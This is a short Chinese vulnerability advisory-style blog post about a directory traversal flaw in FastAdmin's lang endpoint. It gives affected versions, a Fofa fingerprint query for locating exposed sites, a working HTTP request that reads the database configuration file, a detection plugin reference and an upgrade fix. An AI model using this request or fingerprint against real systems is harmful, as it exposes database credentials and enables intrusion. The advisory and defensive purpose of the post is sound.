0x01 漏洞描述:
FastAdmin是一款基于ThinkPHP+Bootstrap开发的快速后台开发框架。FastAdmin基于Apache2.0开源协议发布,免费且不限制商业使用,目前被广泛应用于各大行业应用后台管理。其接口lang存在目录穿越漏洞,攻击者可通过该漏洞获取系统库敏感信息。
0x02 影响版本:
FastAdmin < 1.3.3.20220121
0x03 搜索语句:
Fofa:icon_hash="-1036943727"
0x04 漏洞复现:
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
0x05 yakit检测:
该漏洞已支持yakit插件检测,根据uuid 39894f51-f782-48eb-bb01-d1e0421b8e9c 进行下载
0x06 修复建议:
升级至安全版本:1.3.4.20220530
标签:lang,..,1.3,7928,2024,漏洞,537.36,FastAdmin From: https://blog.csdn.net/xc_214/article/details/141506312